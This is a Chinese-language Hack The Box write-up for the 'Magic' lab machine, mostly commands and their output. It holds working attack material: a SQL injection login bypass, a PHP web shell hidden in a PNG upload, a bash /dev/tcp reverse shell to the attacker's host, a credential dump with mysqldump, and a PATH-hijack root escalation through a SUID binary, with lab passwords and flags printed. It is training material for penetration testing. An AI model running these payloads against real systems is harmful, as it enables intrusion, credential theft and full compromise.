Magic-htb-writeup

0x00 靶场技能介绍

章节技能:SQL注入登录绕过、图片马上传、mysqldump工具使用、账号密码复用、suid提权、环境变量劫持提权

参考链接:https://0xdf.gitlab.io/2020/08/22/htb-magic.html

参考链接:https://tpetersonkth.github.io/2022/03/19/HTB-Magic-Writeup.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.185
2、扫描下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allports 10.10.10.185
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 11:03 CST
Nmap scan report for 10.10.10.185
Host is up (0.29s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.10.185 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 11:04 CST
Nmap scan report for 10.10.10.185
Host is up (0.51s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.16 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allports1 10.10.10.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-10 11:06 CST
Warning: 10.10.10.185 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.185
Host is up (0.32s latency).
All 65535 scanned ports on 10.10.10.185 are in ignored states.
Not shown: 65459 open|filtered udp ports (no-response), 76 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 75.54 seconds

3、这个时候,其实我们知道了目标靶机只开放了22端口和80端口,查看下80端口是什么内容吧
1.png
4、接下来扫一下目录信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.185          
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.185/_24-01-10_11-06-53.txt

Target: http://10.10.10.185/

[11:06:53] Starting:                                    
[11:07:55] 301 -  313B  - /assets  ->  http://10.10.10.185/assets/                         
[11:08:29] 301 -  313B  - /images  ->  http://10.10.10.185/images/          
[11:08:39] 302 -    0B  - /logout.php  ->  index.php
[11:09:24] 302 -    3KB - /upload.php  ->  login.php

Task Completed

5、这里其实是发现了个登录地址

http://10.10.10.185/login.php

6、这里其实存在1个SQL注入的漏洞,可以进行绕过登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /login.php HTTP/1.1
Host: 10.10.10.185
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.10.185
Connection: close
Referer: http://10.10.10.185/login.php
Cookie: PHPSESSID=74u1q3lb74m4f1jlvpph5ohu24
Upgrade-Insecure-Requests: 1

username=admin' or 1=1-- -&password=admin


HTTP/1.1 302 Found
Date: Wed, 10 Jan 2024 03:17:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: upload.php
Content-Length: 4221
Connection: close
Content-Type: text/html; charset=UTF-8

7、跳转进入后,可以发现是一个上传文件的目录

http://10.10.10.185/upload.php

1
2
3
4
5
6
7
8
9
10
GET /upload.php HTTP/1.1
Host: 10.10.10.185
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.10.185/login.php
Connection: close
Cookie: PHPSESSID=74u1q3lb74m4f1jlvpph5ohu24
Upgrade-Insecure-Requests: 1

8、经过尝试,发现这里依旧和前面的靶机一样,没有存在 .php 后缀绕过的漏洞,但是服务器解析这里存在漏洞,这里就正常的往图片里插入一段WEBshell代码吧,这里需要注入的是,需要上传 .png 图片才行。

<?php system($_GET[cmd]); ?>

copy 1.png/b + 1.php/a 3.png

1
2
Content-Disposition: form-data; name="image"; filename="1.php.jpg"
Content-Type: image/jpeg

这里的截图还是jpg的截图,其实是错的,没法直接使用,还是需要使用png的图片上传才行。

9、下面可以看到,成功上传上去了

10、接下来尝试访问下试试

http://10.10.10.185/images/uploads/1.php.png?cmd=id

11、可以看出来,已经成功执行命令了,那接下来就是构造一个反弹shell了,然后进行获取初始权限

bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.8/443+0>%261"

http://10.10.10.185/images/uploads/1.php.png?cmd=bash+-c+%22bash+-i+%3E%26+/dev/tcp/10.10.14.8/443+0%3E%261%22

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.185] 59372
bash: cannot set terminal process group (1198): Inappropriate ioctl for device
bash: no job control in this shell
www-data@magic:/var/www/Magic/images/uploads$ ls
ls
1.jpg
1.php.png
7.jpg
giphy.gif
logo.png
magic-1424x900.jpg
magic-hat_23-2147512156.jpg
magic-wand.jpg
trx.jpg
www-data@magic:/var/www/Magic/images/uploads$

12、通过查看网站的配置目录文件,发现了一个数据库的账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
www-data@magic:/var/www/Magic/images/uploads$ cd ../../
cd ../../
www-data@magic:/var/www/Magic$ ls
ls
assets
db.php5
images
index.php
login.php
logout.php
upload.php
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}
www-data@magic:/var/www/Magic$ ls -la /home/
ls -la /home/
total 12
drwxr-xr-x  3 root    root    4096 Jul  6  2021 .
drwxr-xr-x 24 root    root    4096 Jul  6  2021 ..
drwxr-xr-x 15 theseus theseus 4096 Jul 12  2021 theseus
www-data@magic:/var/www/Magic$

13、这里同时发现用户根目录下,是有这个用户,但是这边尝试su切换,和ssh登录均无法登录,所以密码肯定是错误的,那就按照常规思路,登数据库里查看下密码信息吧

private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

1
2
3
4
5
6
7
8
9
10
11
www-data@magic:/home/theseus$ mysql -u 'theseus' --password='iamkingtheseus' -D Magic -e 'show tables'
<password='iamkingtheseus' -D Magic -e 'show tables'

Command 'mysql' not found, but can be installed with:

apt install mysql-client-core-5.7   
apt install mariadb-client-core-10.1

Ask your administrator to install one of them.

www-data@magic:/home/theseus$

14、这里提示没有mysql的二进制文件,但是通过查看进程,还是发现3306端口是开放的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@magic:/home/theseus$ 
www-data@magic:/home/theseus$ cd /var/www/Magic
cd /var/www/Magic
www-data@magic:/var/www/Magic$ ls
ls
assets  db.php5  images  index.php  login.php  logout.php  upload.php
www-data@magic:/var/www/Magic$ netstat -ano | grep 3306
netstat -ano | grep 3306
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
www-data@magic:/var/www/Magic$ which mysql
which mysql
www-data@magic:/var/www/Magic$ which mysqldump
which mysqldump
/usr/bin/mysqldump
www-data@magic:/var/www/Magic$

15、这里通过尝试常规的MySQL的二进制文件,发现存在MySQLDUMP的工具,这里使用该工具进行密码查询下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
www-data@magic:/var/www/Magic$ mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
<us --password=iamkingtheseus --host=localhost Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-01-09 22:21:03
www-data@magic:/var/www/Magic$

16、这个里面,我们发现了一个admin的密码,经过不断尝试,发现这个密码就是当前用户的密码,可以复用的密码。

17、进行切换账号,获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
www-data@magic:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@magic:/var/www/Magic$ 

theseus@magic:/var/www/Magic$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@magic:/var/www/Magic$ cd ~
cd ~
theseus@magic:~$ 
theseus@magic:~$ ls -la
ls -la
total 80
drwxr-xr-x 15 theseus theseus 4096 Jul 12  2021 .
drwxr-xr-x  3 root    root    4096 Jul  6  2021 ..
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Jul  6  2021 .cache
drwx------ 13 theseus theseus 4096 Jul  6  2021 .config
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Desktop
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Documents
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Downloads
drwx------  3 theseus theseus 4096 Jul  6  2021 .gnupg
-rw-------  1 theseus theseus  636 Jul 12  2021 .ICEauthority
drwx------  3 theseus theseus 4096 Jul  6  2021 .local
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Music
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Pictures
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Public
drwx------  2 theseus theseus 4096 Jul  6  2021 .ssh
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Templates
-r--------  1 theseus theseus   33 Jan  9 18:54 user.txt
drwxr-xr-x  2 theseus theseus 4096 Jul  6  2021 Videos
theseus@magic:~$ cat user.txt
cat user.txt
01c111fd7e898d49f4d5779c27702d28
theseus@magic:~$

0x02 系统权限获取

18、通过查找suid的权限文件,我们发现了一个不常见的进程

1
2
3
4
theseus@magic:~$ find / -user root -type f -perm -4000  -ls 2>/dev/null
find / -user root -type f -perm -4000  -ls 2>/dev/null

   393232     24 -rwsr-x---   1 root     users              22040 Oct 21  2019 /bin/sysinfo

19、该软件是user组的成员可以运行,我们同样是该组的成员。

1
2
3
theseus@magic:~$ cat /etc/group | grep users
cat /etc/group | grep users
users:x:100:theseus

20、经过初始运行,我们发现了这个软件会大量的进行二进制文件的输出

1
2
3
4
5
6
7
8
9
10
11
12
13
theseus@magic:~$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
H/W path           Device     Class      Description
====================================================
..........

theseus@magic:~$ ltrace sysinfo
ltrace sysinfo
....................
popen("lshw -short", "r")                        = 0x5615fbf5a280
popen("fdisk -l", "r")                           = 0x5615fbf5a280
....................

21、在上述的信息输出中,我们发现了popen 这个参数,该函数仅接受命令并在 shell 中执行。这些二进制文件是 lshw 、 fdisk 和 cat free 。这里需要注意的关键是,二进制文件不是使用绝对路径指定的。这意味着二进制文件将在 PATH 环境变量指定的所有目录中搜索这些 sysinfo 二进制文件。

22、这里其实就存在环境变量绕过的提权,我们进行软件的劫持来进行提权

1
2
3
4
5
6
7
8
9
10
11
theseus@magic:~$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
theseus@magic:~$ export PATH="/tmp:$PATH"
export PATH="/tmp:$PATH"
theseus@magic:~$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
theseus@magic:~$ cd /tmp
cd /tmp
theseus@magic:/tmp$

23、接下来,我们在 /tmp 目录中创建一个名为“lshw”的文件,并确保它包含命令 bash 1>&0 2>&0 。我们使用 1>&0 和 重定向 STDOUT 和 STDERR 2>&0 到 STDIN .然后,我们用来 chmod 将文件转换为可执行文件。请注意,我们选择将脚本命名为“lshw”,但该名称也可以设置为其他三个二进制文件中的任何一个。

1
2
3
4
5
6
7
8
9
10
theseus@magic:~$ cd /tmp
cd /tmp
theseus@magic:/tmp$ echo 'bash 1>&0 2>&0' > /tmp/lshw
echo 'bash 1>&0 2>&0' > /tmp/lshw
theseus@magic:/tmp$ chmod +x /tmp/lshw
chmod +x /tmp/lshw
theseus@magic:/tmp$ ls
ls
lshw
theseus@magic:/tmp$

24、我们通过再次运行,成功获取到root的权限,并读取到了最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
root@magic:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@magic:/tmp# cd /root
cd /root
root@magic:/root# ls
ls
info.c  root.txt  snap
root@magic:/root# cat root.txt
cat root.txt
782bc992e58f8ca21ce081b912f06354
root@magic:/root#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/241

打靶记
#shooting-range
Magic-htb-writeup
https://sh1yan.top/2024/01/10/Magic-htb-writeup-htb-writeup/
作者
shiyan
发布于
2024年1月10日
许可协议